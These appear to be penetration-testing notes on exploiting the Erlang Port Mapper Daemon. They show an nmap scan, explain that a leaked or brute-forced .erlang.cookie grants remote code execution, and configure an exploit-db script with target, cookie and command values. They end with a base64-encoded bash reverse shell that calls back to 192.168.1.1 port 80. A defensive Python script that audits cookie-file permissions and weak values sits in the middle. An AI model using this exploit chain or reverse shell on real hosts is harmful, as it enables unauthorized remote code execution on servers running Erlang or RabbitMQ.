# Erlang - 4369

<https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd>

```
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info 192.168.1.2

4369/tcp  open   epmd       Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 65000
65000/tcp open   unknown
```

### Erlang Cookie RCE

If you can **leak the authentication cookie** you will be able to execute code on the host. Usually, this cookie is located in **~/.erlang.cookie** and is generated by Erlang at the first start.

The scan above shows the epmd port and a `rabbit` node on port 65000. To get RCE we need the `.erlang.cookie` value. We can brute-force it or find it via another service on the host.

```
.erlang.cookie
JFKERIPLFKVJSQRDIXJS
```
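Because everything depends on that cookie, the same file is what a defender should audit. The following is an added example, not part of the original notes or of Erlang/RabbitMQ: it checks a cookie file for group/other access and for a guessable value. The function names, the `MIN_LEN` threshold and the sample files are assumptions constructed for the demo.

```python
import os
import re
import stat
import tempfile

MIN_LEN = 32  # assumption: local policy for operator-set cookies


def audit_cookie(path):
    """Return a list of findings for an Erlang cookie file; empty means OK."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    # Any group/other bit lets another local account or service read the cookie.
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append("mode %04o grants group/other access" % mode)
    with open(path, "r", encoding="ascii", errors="replace") as fh:
        cookie = fh.read().strip()
    # 20 uppercase letters is the shape of the auto-generated cookie shown above.
    if re.fullmatch(r"[A-Z]{20}", cookie):
        findings.append("cookie looks auto-generated (20 uppercase letters)")
    elif len(cookie) < MIN_LEN:
        findings.append("cookie shorter than %d characters" % MIN_LEN)
    return findings


def _write(directory, name, value, mode):
    """Create a constructed sample cookie file with the given permissions."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write(value)
    os.chmod(path, mode)
    return path


def demo():
    """Audit three constructed cookie files and return the findings per file."""
    with tempfile.TemporaryDirectory() as d:
        samples = {
            "default": _write(d, "a", "JFKERIPLFKVJSQRDIXJS\n", 0o644),
            "short": _write(d, "b", "s3cret", 0o400),
            "good": _write(d, "c", "x" * 16 + "Q7" * 16, 0o400),
        }
        return {name: audit_cookie(p) for name, p in samples.items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or "OK")
```

On a real host, point `audit_cookie` at the cookie file of each account that runs an Erlang node (for example the service account's home directory).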

### Erlang Cookie - Remote Code Execution

<https://www.exploit-db.com/exploits/49418>

```
$ python3 49418
```

We need to change the relevant parts of the code:

```
TARGET = "192.168.1.2"
PORT = 65000
COOKIE = "JFKERIPLFKVJSQRDIXJS"
CMD = "id"
```

```
# /bin/bash -i >& /dev/tcp/192.168.1.1/80 0>&1, Base64 encoded

CMD="echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xLzgwIDA+JjE= | base64 -d > shell.sh"
CMD="bash shell.sh"
```
